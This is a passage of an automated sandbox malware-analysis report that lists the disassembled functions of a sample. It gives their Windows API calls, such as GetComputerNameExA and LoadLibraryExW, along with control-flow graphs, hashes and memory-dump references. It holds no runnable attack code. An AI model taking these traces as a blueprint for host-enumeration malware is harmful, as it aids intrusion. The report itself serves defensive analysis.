                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                • Opcode ID: 51e17ebc42db90c98e5cb4e2d3be0338a2324d50f7aa32a4ef7aef279bd404fe
                                                                                                                                                                • Instruction ID: 034c1299121035d27c78dc67f148540ba22cd4eb75d8f9db081e68ee5501019d
                                                                                                                                                                • Opcode Fuzzy Hash: 51e17ebc42db90c98e5cb4e2d3be0338a2324d50f7aa32a4ef7aef279bd404fe
                                                                                                                                                                • Instruction Fuzzy Hash: 1A5136B5A0C30D4BD728AF68C940A3FB7D6ABD5310F19C96CE685D7391E631AC428B85
                                                                                                                                                                Function 009CCC7A Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 237503144-0
                                                                                                                                                                • Opcode ID: a4178be2b65fbf6849acfe8d501510c20e1b365491f5dfa7ea2228e80dff76b0
                                                                                                                                                                • Instruction ID: f1843b0be0f634cb2f0ec7cf4b8c8157997462d4b43ab261fe5ebf2e06ede97b
                                                                                                                                                                • Opcode Fuzzy Hash: a4178be2b65fbf6849acfe8d501510c20e1b365491f5dfa7ea2228e80dff76b0
                                                                                                                                                                • Instruction Fuzzy Hash: 3F3118EAF012846BE50A77222C67F7F61574BD0718F08142CF50B2A383ED69FD16969B
                                                                                                                                                                Function 009ED7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1593 9ed7ee-9ed7f3 1594 9ed7f5-9ed7f9 1593->1594 1595 9ed813-9ed819 1593->1595 1597 9ed800-9ed809 1594->1597 1596 9ed896-9edbfb FreeLibrary call 9ffe00 1595->1596 1602 9edc00-9edc12 1596->1602 1597->1597 1598 9ed80b-9ed80e 1597->1598 1598->1596 1602->1602 1603 9edc14-9edc19 1602->1603 1604 9edc2d 1603->1604 1605 9edc1b-9edc1f 1603->1605 1607 9edc30-9edc72 GetComputerNameExA 1604->1607 1606 9edc20-9edc29 1605->1606 1606->1606 1608 9edc2b 1606->1608 1608->1607
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 009ED898
                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 009EDC43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                • Opcode ID: fd426e555c7897800c9a467897f3ffa0ff471323190d4759b72753a59a011b3a
                                                                                                                                                                • Instruction ID: 6525315b2e1a24f1aac307b12ad644765e9ad60fabb9815ca6fba191d960d58a
                                                                                                                                                                • Opcode Fuzzy Hash: fd426e555c7897800c9a467897f3ffa0ff471323190d4759b72753a59a011b3a
                                                                                                                                                                • Instruction Fuzzy Hash: 9A21F871105782CFDB228F26D850726BFE2AF5B301F288A99D4D68B396D6389C43C751
                                                                                                                                                                Function 009ED893 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1609 9ed893-9edbfb FreeLibrary call 9ffe00 1614 9edc00-9edc12 1609->1614 1614->1614 1615 9edc14-9edc19 1614->1615 1616 9edc2d 1615->1616 1617 9edc1b-9edc1f 1615->1617 1619 9edc30-9edc72 GetComputerNameExA 1616->1619 1618 9edc20-9edc29 1617->1618 1618->1618 1620 9edc2b 1618->1620 1620->1619
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 009ED898
                                                                                                                                                                • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 009EDC43
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ComputerFreeLibraryName
                                                                                                                                                                • String ID: ;87>
                                                                                                                                                                • API String ID: 2904949787-2104535307
                                                                                                                                                                • Opcode ID: 943f73cf79802ffe91c2b806385ae330e8a700783333cab8885c1176979728e8
                                                                                                                                                                • Instruction ID: 9fbaee9caba1466767ffd11b9e1b3f7b93578d15ddc29ecbe2c30fcf9592d33b
                                                                                                                                                                • Opcode Fuzzy Hash: 943f73cf79802ffe91c2b806385ae330e8a700783333cab8885c1176979728e8
                                                                                                                                                                • Instruction Fuzzy Hash: BC11C4B1101642CFD7128F35DC5076ABBE2FF9B311F29CA94D4D68B292DA349842CB51
                                                                                                                                                                Function 009C9D1E Relevance: 3.1, APIs: 2, Instructions: 142libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 009C9D98
                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000), ref: 009C9E78
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571145095.0000000000C0D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571165129.0000000000C19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571183489.0000000000C1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571201365.0000000000C1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571223021.0000000000C24000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571241974.0000000000C26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571266315.0000000000C2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571284489.0000000000C30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571304485.0000000000C39000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571322727.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571341364.0000000000C3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571360880.0000000000C80000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571418658.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571437564.0000000000CB1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571477078.0000000000CBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571495605.0000000000CBF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_1_2_9c0000_fnCae9FQhg.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                • Opcode ID: 3b71c27fe5c47201247c743e7bb01e58baac258464bb6540bb92d5a32b76a606
                                                                                                                                                                • Instruction ID: 9fffde645f7f6c794e31ef80c2c26bc183a905289ae194fcfe64ab5b78874b7d
                                                                                                                                                                • Opcode Fuzzy Hash: 3b71c27fe5c47201247c743e7bb01e58baac258464bb6540bb92d5a32b76a606
                                                                                                                                                                • Instruction Fuzzy Hash: 2D41D0B4D003449FE7159F789996A9A7F75EB06324F50529CE4902F3A6C631980BCBE2
                                                                                                                                                                Function 009CEF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 009CF09D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000001.00000002.2570616598.00000000009C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                • Associated: 00000001.00000002.2570597510.00000000009C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570616598.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570687244.0000000000A15000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570707941.0000000000A1F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570727284.0000000000A20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570748887.0000000000A21000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570862496.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570880362.0000000000B7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570902630.0000000000B98000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570921145.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000B9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570939408.0000000000BA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570976244.0000000000BA9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2570997656.0000000000BAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571015581.0000000000BAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571032814.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571061633.0000000000BD5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571080914.0000000000BD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571104850.0000000000BDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000001.00000002.2571123110.0000000000BE9000.00000040.00000001.01000000.00000003.sdmpDownload File
